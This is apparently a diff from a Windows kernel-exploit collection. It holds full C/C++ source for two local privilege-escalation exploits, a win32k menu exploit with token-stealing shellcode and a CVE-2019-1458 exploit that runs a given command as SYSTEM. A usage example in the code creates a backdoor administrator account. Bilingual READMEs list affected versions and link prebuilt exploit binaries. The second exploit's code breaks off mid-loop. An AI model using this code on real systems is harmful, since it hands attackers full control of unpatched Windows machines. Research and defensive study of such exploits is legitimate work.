bEnterEvent = FALSE;
}
return CallNextHookEx(0, code, wParam, lParam);
}
static
VOID
CALLBACK
xxWindowEventProc(
HWINEVENTHOOK hWinEventHook,
DWORD event,
HWND hwnd,
LONG idObject,
LONG idChild,
DWORD idEventThread,
DWORD dwmsEventTime
)
{
UNREFERENCED_PARAMETER(hWinEventHook);
UNREFERENCED_PARAMETER(event);
UNREFERENCED_PARAMETER(idObject);
UNREFERENCED_PARAMETER(idChild);
UNREFERENCED_PARAMETER(idEventThread);
UNREFERENCED_PARAMETER(dwmsEventTime);
bEnterEvent = TRUE;
if (iCount < ARRAYSIZE(hwndMenuList))
{
hwndMenuList[iCount] = hwnd;
iCount++;
}
SendMessageW(hwnd, MN_SELECTITEM, 0, 0);
SendMessageW(hwnd, MN_SELECTFIRSTVALIDITEM, 0, 0);
PostMessageW(hwnd, MN_OPENHIERARCHY, 0, 0);
}
__declspec(noinline) int Shellcode()
{
__asm {
xor eax, eax // Set EAX to 0.
mov eax, DWORD PTR fs : [eax + 0x124] // Get nt!_KPCR.PcrbData.
// _KTHREAD is located at FS:[0x124]
mov eax, [eax + 0x50] // Get nt!_KTHREAD.ApcState.Process
mov ecx, eax // Copy current process _EPROCESS structure
mov edx, 0x4 // Windows 7 SP1 SYSTEM process PID = 0x4
SearchSystemPID:
mov eax, [eax + 0B8h] // Get nt!_EPROCESS.ActiveProcessLinks.Flink
sub eax, 0B8h
cmp[eax + 0B4h], edx // Get nt!_EPROCESS.UniqueProcessId
jne SearchSystemPID
mov edx, [eax + 0xF8] // Get SYSTEM process nt!_EPROCESS.Token
mov[ecx + 0xF8], edx // Assign SYSTEM process token.
}
}
static
LRESULT
WINAPI
xxMainWindowProc(
_In_ HWND hwnd,
_In_ UINT msg,
_In_ WPARAM wParam,
_In_ LPARAM lParam
)
{
if (msg == 0x1234)
{
WORD um = 0;
__asm
{
// Grab the value of the CS register and
// save it into the variable UM.
//int 3
mov ax, cs
mov um, ax
}
// If UM is 0x1B, this function is executing in usermode
// code and something went wrong. Therefore output a message that
// the exploit didn't succeed and bail.
if (um == 0x1b)
{
// USER MODE
printf("[!] Exploit didn't succeed, entered sprayCallback with user mode privileges.\r\n");
ExitProcess(-1); // Bail as if this code is hit either the target isn't
// vulnerable or something is wrong with the exploit.
}
else
{
success = TRUE; // Set the success flag to indicate the sprayCallback()
// window procedure is running as SYSTEM.
Shellcode(); // Call the Shellcode() function to perform the token stealing and
// to remove the Job object on the Chrome renderer process.
}
}
return DefWindowProcW(hwnd, msg, wParam, lParam);
}
int main()
{
/* Creating the menu */
for (int i = 0; i < 3; i++)
hMenuList[i] = CreateMenu();
/* Appending the menus along with the item */
for (int i = 0; i < 3; i++)
{
AppendMenuA(hMenuList[i], MF_POPUP | MF_MOUSESELECT, (UINT_PTR)hMenuList[i + 1], "item");
}
AppendMenuA(hMenuList[2], MF_POPUP | MF_MOUSESELECT, (UINT_PTR)0, "item");
/* Creating a main window class */
xxRegisterWindowClassW(L"WNDCLASSMAIN", 0x000, DefWindowProc);
hWindowMain = xxCreateWindowExW(L"WNDCLASSMAIN",
WS_EX_LAYERED | WS_EX_TOOLWINDOW | WS_EX_TOPMOST,
WS_VISIBLE,
GetModuleHandleA(NULL));
printf("Handle of the mainWindow : 0x%08X\n", (unsigned int)hWindowMain);
ShowWindow(hWindowMain, SW_SHOWNOACTIVATE);
/* Creating the hunt window class */
xxRegisterWindowClassW(L"WNDCLASSHUNT", 0x000, xxMainWindowProc);
hWindowHunt = xxCreateWindowExW(L"WNDCLASSHUNT",
WS_EX_LEFT,
WS_OVERLAPPEDWINDOW,
GetModuleHandleA(NULL));
printf("Handle of the huntWindow : 0x%08X\n", (unsigned int)hWindowHunt);
/* Hooking the WH_CALLWNDPROC function */
SetWindowsHookExW(WH_CALLWNDPROC, xxWindowHookProc, GetModuleHandleA(NULL), GetCurrentThreadId());
/* Hooking the trackpopupmenuEx WINAPI call */
HWINEVENTHOOK hEventHook = SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART, GetModuleHandleA(NULL), xxWindowEventProc,
GetCurrentProcessId(), GetCurrentThreadId(), 0);
/* Setting the root popup menu to null */
printf("Setting the root popup menu to null\n");
release = 0;
TrackPopupMenuEx(hMenuList[0], 0, 0, 0, hWindowMain, NULL);
/* Allocating the memory at NULL page */
*(FARPROC *)&NtAllocateVirtualMemory = GetProcAddress(GetModuleHandleW(L"ntdll"), "NtAllocateVirtualMemory");
if (NtAllocateVirtualMemory == NULL)
return 1;
if (!NT_SUCCESS(NtAllocateVirtualMemory(NtCurrentProcess(),
&MemAddr,
0,
&MemSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE)) || MemAddr != NULL)
{
std::cout << "[-]Memory alloc failed!" << std::endl;
return 1;
}
ZeroMemory(MemAddr, MemSize);
/* Getting the tagWND of the hWindowHunt */
PTHRDESKHEAD head = (PTHRDESKHEAD)xxHMValidateHandle(hWindowHunt);
printf("Address of the win32k!tagWND of hWindowHunt : 0x%08X\n", (unsigned int)head->deskhead.pSelf);
/* Creating a fake POPUPMENU structure */
DWORD dwPopupFake[0x100] = { 0 };
dwPopupFake[0x0] = (DWORD)0x1; //->flags
dwPopupFake[0x1] = (DWORD)0x1; //->spwndNotify
dwPopupFake[0x2] = (DWORD)0x1; //->spwndPopupMenu
dwPopupFake[0x3] = (DWORD)0x1; //->spwndNextPopup
dwPopupFake[0x4] = (DWORD)0x1; //->spwndPrevPopup
dwPopupFake[0x5] = (DWORD)0x1; //->spmenu
dwPopupFake[0x6] = (DWORD)0x1; //->spmenuAlternate
dwPopupFake[0x7] = (ULONG)head->deskhead.pSelf + 0x12; //->spwndActivePopup
dwPopupFake[0x8] = (DWORD)0x1; //->ppopupmenuRoot
dwPopupFake[0x9] = (DWORD)0x1; //->ppmDelayedFree
dwPopupFake[0xA] = (DWORD)0x1; //->posSelectedItem
dwPopupFake[0xB] = (DWORD)0x1; //->posDropped
dwPopupFake[0xC] = (DWORD)0;
/* Copying it to the NULL page */
RtlCopyMemory(MemAddr, dwPopupFake, 0x1000);
/* Allowing to access the NULL page mapped values */
release = 1;
hwndMenuList[2] = NULL;
TrackPopupMenuEx(hMenuList[1], 0, 0, 0, hWindowMain, NULL);
/* Freeing the allocated NULL memory */
VirtualFree(MemAddr, 0x1000, 0);
SendMessageW(hWindowHunt, 0x1234, (WPARAM)hwndMenuList[0], 0x11);
if (success)
{
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOW;
printf("Getting the shell now...\n");
BOOL bRet = CreateProcessA(NULL, (LPSTR)"cmd.exe", NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
if (bRet)
{
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
}
}
DestroyWindow(hWindowMain);
MSG msg = { 0 };
while (GetMessageW(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessageW(&msg);
}
return 0;
}
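Review bot: The comment on the `Shellcode();` call inside `xxMainWindowProc` says it will "remove the Job object on the Chrome renderer process", but the inline assembly in `Shellcode()` only walks `ActiveProcessLinks` and copies the token field; nothing in this file touches a Job object, and the `sprayCallback` named in the surrounding comments does not exist here either, so both read as carried over from a different PoC. Rewrite them to describe this file, e.g. `// Call Shellcode() to copy the SYSTEM token into the current process.` and `// window procedure is running with kernel-mode CS.` The fixed `fs:[0x124]`, `0xB8`, `0xB4`, `0xF8` offsets and PID 4 in `Shellcode()` appear to be the Windows 7 SP1 x86 values the README restricts this build to; a one-line comment at the top of `Shellcode()` stating that assumption would make the version dependency visible in the code rather than only in the README.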



@ -0,0 +1,49 @@
### CVE-2019-1388
#### 描述
该漏洞位于Windows的UACUser Account Control用户帐户控制机制中。默认情况下Windows会在一个单独的桌面上显示所有的UAC提示——Secure Desktop。这些提示是由名为consent.exe的可执行文件产生的该可执行文件以NT AUTHORITY\SYSTEM权限运行完整性级别为System。因为用户可以与该UI交互因此必须对UI进行严格限制。否则低权限的用户可能可以通过UI操作的循环路由以SYSTEM权限执行操作。即使隔离状态的看似无害的UI特征都可能会成为引发任意控制的动作链的第一步。事实上UAC对话框已被精简仅包含最少的可单击选项。
#### 影响版本
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows 10 | x64/x86/ARM64 | 1903 | | |
| Windows 10 | x64/x86/ARM64 | 1809 | | |
| Windows 10 | x64/x86/ARM64 | 1803 | | |
| Windows 10 | x64/x86/ARM64 | 1709 | | |
| Windows 10 | x64/x86 | 1607 | | |
| Windows 10 | x64/x86 | | | |
| Windows 7 | x64/x86 | | SP1 | &#10004; |
| Windows 8.1 | x64/x86 | | | |
| Windows RT 8.1 | | | | |
| Windows Server 2008 | x64/x86 | R2 | SP1 | |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
| Windows Server 2019 | | | | |
| Windows Server | | 1903 | | |
| Windows Server | | 1803 | | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388
```
#### 利用方式
这边直接贴一个GIF图就好了利用文件位置
```
https://github.com/Ascotbe/WindowsKernelExploits/blob/master/CVE-2019-1388/HHUPD.EXE
```
测试系统Windows 7 SP1 x64
![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-1388_win7_sp1_x64.gif)
#### 分析文章
- http://blog.leanote.com/post/snowming/38069f423c76
- https://mp.weixin.qq.com/s/q4UICIVwC4HX-ytvWo8Dvw


@ -0,0 +1,49 @@
### CVE-2019-1388
#### Describe
An elevation of privilege vulnerability exists in the Windows Certificate Dialog when it does not properly enforce user privileges, aka 'Windows Certificate Dialog Elevation of Privilege Vulnerability'.
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows 10 | x64/x86/ARM64 | 1903 | | |
| Windows 10 | x64/x86/ARM64 | 1809 | | |
| Windows 10 | x64/x86/ARM64 | 1803 | | |
| Windows 10 | x64/x86/ARM64 | 1709 | | |
| Windows 10 | x64/x86 | 1607 | | |
| Windows 10 | x64/x86 | | | |
| Windows 7 | x64/x86 | | SP1 | &#10004; |
| Windows 8.1 | x64/x86 | | | |
| Windows RT 8.1 | | | | |
| Windows Server 2008 | x64/x86 | R2 | SP1 | |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
| Windows Server 2019 | | | | |
| Windows Server | | 1903 | | |
| Windows Server | | 1803 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388
```
#### Utilization
It's just a GIF map directly, use the file location.
```
https://github.com/Ascotbe/WindowsKernelExploits/blob/master/CVE-2019-1388/HHUPD.EXE
```
Test system Windows 7 SP1 x64
![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-1388_win7_sp1_x64.gif)
#### Analyze
- http://blog.leanote.com/post/snowming/38069f423c76
- https://mp.weixin.qq.com/s/q4UICIVwC4HX-ytvWo8Dvw


@ -0,0 +1,47 @@
### CVE-2019-1458
#### 描述
CVE-2019-1458是Win32k中的特权提升漏洞Win32k组件无法正确处理内存中的对象时导致Windows中存在一个特权提升漏洞。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。然后攻击者可能会安装程序、查看、更改或删除数据或创建具有完全用户权限的新帐户。
#### 影响版本
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows 10 | x64/x86 | 1607 | | |
| Windows 10 | x64/x86 | | | |
| Windows 7 | x64/x86 | | SP1 | &#10004; |
| Windows 8.1 | x64/x86 | | | |
| Windows RT 8.1 | | | | |
| Windows Server 2008 | x64/x86 | R2 | SP1 | |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458
```
#### 利用方式
编译环境
- VS2019V120X64 Release
编译好的文件
```
cve-2019-1458.exe
```
测试系统Windows 7 SP1 x64 直接上GIF图
![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-1458_win7_sp1_x64.gif)
#### 分析文章
- https://github.com/piotrflorczyk/cve-2019-1458_POC
- https://bbs.pediy.com/thread-260268.htm
- https://thunderjie.github.io/2020/03/21/CVE-2019-1458-%E4%BB%8E-%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-%E5%88%B0POC%E7%9A%84%E7%BC%96%E5%86%99%E8%BF%87%E7%A8%8B/


@ -0,0 +1,48 @@
### CVE-2019-1458
#### Describe
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows 10 | x64/x86 | 1607 | | |
| Windows 10 | x64/x86 | | | |
| Windows 7 | x64/x86 | | SP1 | &#10004; |
| Windows 8.1 | x64/x86 | | | |
| Windows RT 8.1 | | | | |
| Windows Server 2008 | x64/x86 | R2 | SP1 | |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458
```
#### Utilization
CompilerEnvironment
- VS2019V120X64 Release
Compile a good file
```
cve-2019-1458.exe
```
Test system Windows 7 SP1 x64 Direct GIF map
![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-1458_win7_sp1_x64.gif)
#### Analyze
- https://github.com/piotrflorczyk/cve-2019-1458_POC
- https://bbs.pediy.com/thread-260268.htm
- https://thunderjie.github.io/2020/03/21/CVE-2019-1458-%E4%BB%8E-%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-%E5%88%B0POC%E7%9A%84%E7%BC%96%E5%86%99%E8%BF%87%E7%A8%8B/



@ -0,0 +1,28 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2019-1458", "cve-2019-1458\cve-2019-1458.vcxproj", "{FD32BB28-7082-41EA-B221-26E8D10A1CC9}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Debug|x64 = Debug|x64
Release|Win32 = Release|Win32
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{FD32BB28-7082-41EA-B221-26E8D10A1CC9}.Debug|Win32.ActiveCfg = Debug|Win32
{FD32BB28-7082-41EA-B221-26E8D10A1CC9}.Debug|Win32.Build.0 = Debug|Win32
{FD32BB28-7082-41EA-B221-26E8D10A1CC9}.Debug|x64.ActiveCfg = Debug|x64
{FD32BB28-7082-41EA-B221-26E8D10A1CC9}.Debug|x64.Build.0 = Debug|x64
{FD32BB28-7082-41EA-B221-26E8D10A1CC9}.Release|Win32.ActiveCfg = Release|Win32
{FD32BB28-7082-41EA-B221-26E8D10A1CC9}.Release|Win32.Build.0 = Release|Win32
{FD32BB28-7082-41EA-B221-26E8D10A1CC9}.Release|x64.ActiveCfg = Release|x64
{FD32BB28-7082-41EA-B221-26E8D10A1CC9}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal


@ -0,0 +1,417 @@
#include <stdio.h>
#include <windows.h>
#include <VersionHelpers.h>
typedef struct _LARGE_UNICODE_STRING {
ULONG Length;
ULONG MaximumLength : 31;
ULONG bAnsi : 1;
PWSTR Buffer;
} LARGE_UNICODE_STRING, *PLARGE_UNICODE_STRING;
extern "C" NTSTATUS NtUserMessageCall(HANDLE hWnd, UINT msg, WPARAM wParam, LPARAM lParam, ULONG_PTR ResultInfo, DWORD dwType, BOOL bAscii);
extern "C" NTSTATUS NtUserDefSetText(HANDLE hWnd, PLARGE_UNICODE_STRING plstr);
extern "C" DWORD g_NtUserDefSetText_syscall = 0x1080, g_NtUserMessageCall_syscall = 0x1009;
#define SPARY_TIMES 0x1000
#ifdef _WIN64
typedef void*(NTAPI *lHMValidateHandle)(HANDLE h, int type);
#else
typedef void*(__fastcall *lHMValidateHandle)(HANDLE h, int type);
#endif
typedef NTSTATUS(__stdcall*RtlGetVersionT)(PRTL_OSVERSIONINFOW lpVersionInformation);
HWND g_hwnd = 0;
ULONG_PTR g_gap = 0;
lHMValidateHandle pHmValidateHandle = NULL;
BOOL FindHMValidateHandle() {
HMODULE hUser32 = LoadLibraryA("user32.dll");
if (hUser32 == NULL) {
printf("Failed to load user32");
return FALSE;
}
BYTE* pIsMenu = (BYTE *)GetProcAddress(hUser32, "IsMenu");
if (pIsMenu == NULL) {
printf("Failed to find location of exported function 'IsMenu' within user32.dll\n");
return FALSE;
}
unsigned int uiHMValidateHandleOffset = 0;
for (unsigned int i = 0; i < 0x1000; i++) {
BYTE* test = pIsMenu + i;
if (*test == 0xE8) {
uiHMValidateHandleOffset = i + 1;
break;
}
}
if (uiHMValidateHandleOffset == 0) {
printf("Failed to find offset of HMValidateHandle from location of 'IsMenu'\n");
return FALSE;
}
unsigned int addr = *(unsigned int *)(pIsMenu + uiHMValidateHandleOffset);
unsigned int offset = ((unsigned int)pIsMenu - (unsigned int)hUser32) + addr;
//The +11 is to skip the padding bytes as on Windows 10 these aren't nops
pHmValidateHandle = (lHMValidateHandle)((ULONG_PTR)hUser32 + offset + 11);
return TRUE;
}
VOID
NTAPI
RtlInitLargeUnicodeString(IN OUT PLARGE_UNICODE_STRING DestinationString,
IN PCWSTR SourceString)
{
ULONG DestSize;
if (SourceString)
{
DestSize = wcslen(SourceString) * sizeof(WCHAR);
DestinationString->Length = DestSize;
DestinationString->MaximumLength = DestSize + sizeof(WCHAR);
}
else
{
DestinationString->Length = 0;
DestinationString->MaximumLength = 0;
}
DestinationString->Buffer = (PWSTR)SourceString;
DestinationString->bAnsi = FALSE;
}
void writedata(ULONG_PTR addr, ULONG_PTR data, ULONG size)
{
SetClassLongPtr(g_hwnd, g_gap, addr);
CHAR input[sizeof(ULONG_PTR)*2];
RtlSecureZeroMemory(&input, sizeof(input));
LARGE_UNICODE_STRING u;
for (int i = 0; i<sizeof(ULONG_PTR); i++)
{
input[i] = (data >> (8 * i)) & 0xff;
}
RtlInitLargeUnicodeString(&u, (PCWSTR)input);
u.Length = size;
u.MaximumLength = size;
NtUserDefSetText(g_hwnd, &u);
}
ULONG_PTR readdata(ULONG_PTR addr)
{
SetClassLongPtr(g_hwnd, g_gap, addr);
ULONG_PTR temp[2] = {0};
InternalGetWindowText(g_hwnd, (LPWSTR)temp, sizeof(temp) - sizeof(WCHAR));
return temp[0];
}
int main()
{
ULONG_PTR off_tagWND_pself = 0x20, off_tagCLS_extra=0xa0, off_tagWND_tagCLS=0x98, off_tagWND_strName=0xe0;
ULONG_PTR off_EPROCESS_Token = 0x348, off_KTHREAD_EPROCESS = 0x220, off_tagWND_parent=0x58, off_tagWND_pti=0x10;
ULONG_PTR off_exp_tagCLS = 0;
int argc = 0;
wchar_t **argv = CommandLineToArgvW(GetCommandLineW(), &argc);
puts("CVE-2019-1458 exploit by @unamer(https://github.com/unamer)");
if (argc != 2)
{
printf("Usage: %S command\nExample: %S \"net user admin admin /ad & net user localgroup administrators admin /ad\"\n\nWARNING: YOU ONLY HAVE ONE CHANCE!!!", argv[0], argv[0]);
return -1;
}
OSVERSIONINFOW osver;
RtlSecureZeroMemory(&osver, sizeof(osver));
osver.dwOSVersionInfoSize = sizeof(osver);
RtlGetVersionT pRtlGetVersion = (RtlGetVersionT)GetProcAddress(GetModuleHandleA("ntdll"), "RtlGetVersion");
pRtlGetVersion(&osver);
if (osver.dwMajorVersion == 6) {
#ifdef _WIN64
if (osver.dwMinorVersion == 0)//win2008
{
off_tagWND_pself = 0x20;
off_tagCLS_extra = 0xa0;
off_tagWND_tagCLS = 0x98;
off_tagWND_strName = 0xe0;
off_KTHREAD_EPROCESS = 0x210;
off_tagWND_parent = 0x58;
off_EPROCESS_Token = 0x208;
off_tagWND_pti = 0x10;
g_NtUserDefSetText_syscall = 0x1081;
g_NtUserMessageCall_syscall = 0x1007;
off_exp_tagCLS = 1; // stupid windows 2008
}
else if (osver.dwMinorVersion==1)
{//win7 / win2008 R2
off_tagWND_pself = 0x20;
off_tagCLS_extra = 0xa0;
off_tagWND_tagCLS = 0x98;
off_tagWND_strName = 0xe0;
off_KTHREAD_EPROCESS = 0x210;
off_tagWND_parent = 0x58;
off_EPROCESS_Token = 0x208;
off_tagWND_pti = 0x10;
g_NtUserDefSetText_syscall = 0x107f;
g_NtUserMessageCall_syscall = 0x1007;
off_exp_tagCLS = 1; // stupid windows 2008
}
else if (osver.dwMinorVersion == 2)
{
// win8/win2012
off_tagWND_pself = 0x20;
off_tagCLS_extra = 0xa0;
off_tagWND_tagCLS = 0x98;
off_tagWND_strName = 0xe0;
off_EPROCESS_Token = 0x348;
off_KTHREAD_EPROCESS = 0x220;
off_tagWND_parent = 0x58;
off_tagWND_pti = 0x10;
g_NtUserDefSetText_syscall = 0x107f;
g_NtUserMessageCall_syscall = 0x1008;
}
else if (osver.dwMinorVersion==3)
{
// win8.1 / win2012 R2
off_tagWND_pself = 0x20;
off_tagCLS_extra=0xa0;
off_tagWND_tagCLS=0x98;
off_tagWND_strName=0xe0;
off_EPROCESS_Token = 0x348;
off_KTHREAD_EPROCESS = 0x220;
off_tagWND_parent=0x58;
off_tagWND_pti=0x10;
g_NtUserDefSetText_syscall = 0x1080;
g_NtUserMessageCall_syscall = 0x1009;
}
else
{
printf("[!] This version of system was not supported (%d.%d)\n", osver.dwMajorVersion, osver.dwMinorVersion);
return -99;
}
#else
// too lazy to support x32 version
if (osver.dwMinorVersion == 0)//win2008
{
}
else
{//win7
}
#endif
}
else
{
printf("[!] This version of system was not supported (%d.%d)\n", osver.dwMajorVersion, osver.dwMinorVersion);
return -99;
}
if (!FindHMValidateHandle()) {
printf("[!] Failed to locate HmValidateHandle, exiting\n");
return 1;
}
ULONG_PTR base_alloc = 0xc00000;
ULONG_PTR target_addr = base_alloc << (8 * off_exp_tagCLS);
ULONG_PTR temp = (ULONG_PTR)VirtualAlloc((LPVOID)target_addr, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (temp != target_addr)
{
printf("[!] Failed to map 0x%p (0x%p), exiting (%llx)\n", target_addr, temp, GetLastError());
return 2;
}
target_addr = (base_alloc + 0x10000) << (8 * off_exp_tagCLS);
temp = (ULONG_PTR)VirtualAlloc((LPVOID)target_addr, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (temp != target_addr)
{
printf("[!] Failed to map 0x%p (0x%p), exiting (%llx)\n", target_addr, temp, GetLastError());
return 2;
}
const wchar_t CLASS_NAME[] = L"unamer";
WNDCLASS wc;
RtlSecureZeroMemory(&wc, sizeof(wc));
HINSTANCE hself = GetModuleHandle(0);
wc.lpfnWndProc = DefWindowProc;
wc.hInstance = hself;
wc.lpszClassName = CLASS_NAME;
wc.cbWndExtra = 0x3000;
wc.cbClsExtra = 0x3000;
RegisterClass(&wc);
HWND hwnd;
ULONG_PTR tagWND = 0, tagCLS = 0;
INT64 gap = 0;
while (true)
{
hwnd = CreateWindowEx(0, CLASS_NAME, L"unamer", 0, 0, 0, 0, 0, NULL, NULL, hself, NULL);
if (hwnd == NULL)
{
printf("[!] CreateWindowEx error 0x%x!\n", GetLastError());
return 3;
}
char* lpUserDesktopHeapWindow = (char*)pHmValidateHandle(hwnd, 1);
tagWND = *(ULONG_PTR*)(lpUserDesktopHeapWindow + off_tagWND_pself);
// ULONG_PTR ulClientDelta = tagWND - (ULONG_PTR)lpUserDesktopHeapWindow;
tagCLS = *(ULONG_PTR*)(lpUserDesktopHeapWindow + off_tagWND_tagCLS);
gap = tagWND - tagCLS;
if (gap>0 && gap<0x100000)
{
break;
}
}
printf("[*] tagWND: 0x%p, tagCLS:0x%p, gap:0x%llx\n", tagWND, tagCLS, gap);
WNDCLASSEX wcx;
RtlSecureZeroMemory(&wcx, sizeof(wcx));
wcx.hInstance = hself;
wcx.cbSize = sizeof(wcx);
wcx.lpszClassName = L"SploitWnd";
wcx.lpfnWndProc = DefWindowProc;
wcx.cbWndExtra = 8; //pass check in xxxSwitchWndProc to set wnd->fnid = 0x2A0
printf("[*] Registering window\n");
ATOM wndAtom = RegisterClassEx(&wcx);
if (wndAtom == INVALID_ATOM) {
printf("[-] Failed registering SploitWnd window class\n");
exit(-1);
}
printf("[*] Creating instance of this window\n");
HWND sploitWnd = CreateWindowEx(0, L"SploitWnd", L"", WS_VISIBLE, 0, 0, 0, 0, NULL, NULL, hself, NULL);
if (sploitWnd == INVALID_HANDLE_VALUE) {
printf("[-] Failed to create SploitWnd window\n");
exit(-1);
}
// ULONG_PTR tagExpWnd = *(ULONG_PTR*)((char*)pHmValidateHandle(sploitWnd, 1) + off_tagWND_pself);
// printf("[*] tagWND: 0x%p, tagCLS: 0x%p,tagExpWnd: 0x%p, gap: 0x%llx\n", tagWND, tagCLS, tagExpWnd, gap);
printf("[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window 0x%p\n", sploitWnd);
NtUserMessageCall(sploitWnd, WM_CREATE, 0, 0, 0, 0xE0, 1);
printf("[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced\n");
SetWindowLongPtr(sploitWnd, 0, tagCLS - off_exp_tagCLS);
printf("[*] GetLastError = %x\n", GetLastError());
printf("[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130\n");
HWND switchWnd = CreateWindowEx(0, (LPCWSTR)0x8003, L"", 0, 0, 0, 0, 0, NULL, NULL, hself, NULL);
printf("[*] Simulating alt key press\n");
BYTE keyState[256];
GetKeyboardState(keyState);
keyState[VK_MENU] |= 0x80;
SetKeyboardState(keyState);
/* keybd_event(VK_MENU, 0, 0, 0);*/
printf("[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second time\n");
NtUserMessageCall(sploitWnd, WM_ERASEBKGND, 0, 0, 0, 0x0, 1);
// now cbCLSExtra is very large
// verify the oob read
ULONG_PTR orig_name = SetClassLongPtr(hwnd, gap - off_tagCLS_extra + off_tagWND_strName, tagWND + off_tagWND_pself);
ULONG_PTR testtagWND[2] = { 0 };
InternalGetWindowText(hwnd, (LPWSTR)testtagWND, sizeof(ULONG_PTR));
if (testtagWND[0] == tagWND)
{
ULONG_PTR tagExpWnd = *(ULONG_PTR*)((char*)pHmValidateHandle(sploitWnd, 1) + off_tagWND_pself);
printf("[*] tagWND: 0x%p\n", tagExpWnd);
printf("[+] Exploit success!\n");
// fix tagCLS
g_hwnd = hwnd;
g_gap = gap - off_tagCLS_extra + off_tagWND_strName;
writedata(tagExpWnd + 0x40, 0,4);
writedata(tagCLS + 0x68, (ULONG_PTR)hself, 8);
writedata(tagCLS + 0x58, (ULONG_PTR)DefWindowProc, 8);
ULONG_PTR token = readdata(readdata(readdata(readdata(readdata(tagWND + off_tagWND_parent) + off_tagWND_pti)) + off_KTHREAD_EPROCESS) + off_EPROCESS_Token);
ULONG_PTR ep = readdata(readdata(readdata(tagWND + off_tagWND_pti)) + off_KTHREAD_EPROCESS); // self EPROCESS
ULONG_PTR temp = readdata(ep + off_EPROCESS_Token + sizeof(ULONG_PTR)); // fix WorkingSetPage
writedata(ep + off_EPROCESS_Token, token, 8);
writedata(ep + off_EPROCESS_Token + sizeof(ULONG_PTR), temp,8);
// fix tagWND
SetClassLongPtr(hwnd, g_gap, orig_name);
DestroyWindow(hwnd);
g_hwnd = 0;
DestroyWindow(sploitWnd);
UnregisterClass(CLASS_NAME, 0);
UnregisterClass(L"SploitWnd", 0);
SECURITY_ATTRIBUTES sa;
HANDLE hRead, hWrite;
byte buf[40960] = { 0 };
STARTUPINFOW si;
PROCESS_INFORMATION pi;
DWORD bytesRead;
RtlSecureZeroMemory(&si, sizeof(si));
RtlSecureZeroMemory(&pi, sizeof(pi));
RtlSecureZeroMemory(&sa, sizeof(sa));
int br = 0;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if (!CreatePipe(&hRead, &hWrite, &sa, 0))
{
return -3;
}
wprintf(L"[*] Trying to execute %s as SYSTEM\n", argv[1]);
si.cb = sizeof(STARTUPINFO);
GetStartupInfoW(&si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.lpDesktop = L"WinSta0\\Default";
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
wchar_t cmd[4096] = { 0 };
lstrcpyW(cmd, argv[1]);
if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
{
CloseHandle(hWrite);
CloseHandle(hRead);
printf("[!] CreateProcessW Failed![%lx]\n", GetLastError());
return -2;
}
CloseHandle(hWrite);
printf("[+] ProcessCreated with pid %d!\n", pi.dwProcessId);
while (1)
{
